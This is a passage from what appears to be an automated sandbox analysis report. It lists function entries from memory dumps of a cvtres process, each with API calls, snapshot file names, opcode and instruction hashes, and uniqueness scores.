                                                                          • Opcode Fuzzy Hash: 5eac4c9643e96c4cf28e02bc5afac3093f4c359795c1d2adb1e2a1c069b5a4e7
                                                                          • Instruction Fuzzy Hash: 9C2167B5C003888FCB10DFAAD444BDEBBF4EF49624F14846AD459B7A10D378A446CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 0696BE72
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: EncodePointer
                                                                          • String ID:
                                                                          • API String ID: 2118026453-0
                                                                          • Opcode ID: a1339666c43c98d446ae7bd56198bc129ecc9f21c37406ad25227685f92929c6
                                                                          • Instruction ID: 8e3b0d911fb3106b58edf1acd9852123abef258eec88ba51c80fcd3eff3ef6cb
                                                                          • Opcode Fuzzy Hash: a1339666c43c98d446ae7bd56198bc129ecc9f21c37406ad25227685f92929c6
                                                                          • Instruction Fuzzy Hash: 6D119A75D003088FDB60DFAAC8097EEBBF4FB09324F248469E405A7A05D7386454CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 06964216
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: d6b99c446dbabe27219cade665c6e73cb791933ab28f3f1746468ab053cff0b6
                                                                          • Instruction ID: decc93315ce6b60250e8d6bd29d29357102b79337ad22147e6a42619e4f5d1b0
                                                                          • Opcode Fuzzy Hash: d6b99c446dbabe27219cade665c6e73cb791933ab28f3f1746468ab053cff0b6
                                                                          • Instruction Fuzzy Hash: 701134B5C003598FCB10CF9AC444BCEFBF4EF48624F14851AD819A7600D374A546CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 06964216
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.501394160.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_6960000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 79f1cf04ae83b1958bf70734f32287d4e7c84242b66eaac894ef43b148a51d40
                                                                          • Instruction ID: eacc173d80d19d9c4b7a34288039a5c8118620283070ef39569bbf4251ad9763
                                                                          • Opcode Fuzzy Hash: 79f1cf04ae83b1958bf70734f32287d4e7c84242b66eaac894ef43b148a51d40
                                                                          • Instruction Fuzzy Hash: 751102B5C003498FDB20CF9AD444BDEFBF4EB49624F15852AE829B7A10D374A546CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.499975836.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_cad000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fc40cf8540a3c32ff3330fdce80926fe76cf7601da1abbdef7c3ef28f1bee176
                                                                          • Instruction ID: 8fb0dea8cc3429ddaad8a036cff03ec091038fb096a964f8a80cdecf99891a3c
                                                                          • Opcode Fuzzy Hash: fc40cf8540a3c32ff3330fdce80926fe76cf7601da1abbdef7c3ef28f1bee176
                                                                          • Instruction Fuzzy Hash: 062103B1904241EFDB05DF10D9C0B67BF65FB89328F248569E8070BA16C336E959CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.499975836.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_cad000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3b7bc2b30724f4594446b24625750d32397d17ca54d3d139d223e510a7013cfe
                                                                          • Instruction ID: c3d1639d15f1131ef250508ad9ea32a919d8e5896eda02d5d1635ce5a1d7937f
                                                                          • Opcode Fuzzy Hash: 3b7bc2b30724f4594446b24625750d32397d17ca54d3d139d223e510a7013cfe
                                                                          • Instruction Fuzzy Hash: 9B2125B1504201DFDB05CF10D9C0B6ABB65FB99328F2486A9E8070BA16C33ADD56CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.500100922.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_cbd000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 99da108c43fc78f9b07c93911189e6f6cb458298501f20f2a2e920a04b6202d7
                                                                          • Instruction ID: 69598bd8c3bea4a0f1a487632769761647a141231abf829c2e7aaf2eca04408c
                                                                          • Opcode Fuzzy Hash: 99da108c43fc78f9b07c93911189e6f6cb458298501f20f2a2e920a04b6202d7
                                                                          • Instruction Fuzzy Hash: EC21F575504240DFDB14EF24E5C4B96BB65FB84324F24C5ADD80A4B746D33AD846CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.500100922.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_cbd000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 612906765bcd49cd980ffd30a356e75b28936e917656e435d62410882036a52e
                                                                          • Instruction ID: 8ddc27ae521c89c1da7d6853192ea29407f868c07097ffd917117982bc7df376
                                                                          • Opcode Fuzzy Hash: 612906765bcd49cd980ffd30a356e75b28936e917656e435d62410882036a52e
                                                                          • Instruction Fuzzy Hash: BF219F755093C08FCB02CF20D994B55BF71EB46314F29C5EAD8498B6A7C33A984ACB62
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.499975836.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_cad000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 84cdbab479f547c7f1c896447cd36e98ff8f220592cac18d88e2041baaf44a8b
                                                                          • Instruction ID: 281adfd55f85905bc17d16a5a1ba34c1f52521a9df9fc99153fff6170ca30beb
                                                                          • Opcode Fuzzy Hash: 84cdbab479f547c7f1c896447cd36e98ff8f220592cac18d88e2041baaf44a8b
                                                                          • Instruction Fuzzy Hash: 9811D676804280DFDF12CF10D5C4B16BF71FB85328F24C5A9D8060B616C336D95ACB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.499975836.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_cad000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 84cdbab479f547c7f1c896447cd36e98ff8f220592cac18d88e2041baaf44a8b
                                                                          • Instruction ID: efd33f12fbf4b937287da3e87df0661ad04dc66f4c824449376846bbc3a74468
                                                                          • Opcode Fuzzy Hash: 84cdbab479f547c7f1c896447cd36e98ff8f220592cac18d88e2041baaf44a8b
                                                                          • Instruction Fuzzy Hash: C911D376404280DFDB16CF10D5C4B56BF71FB99328F28C6A9DC060B61AC33AD95ACBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%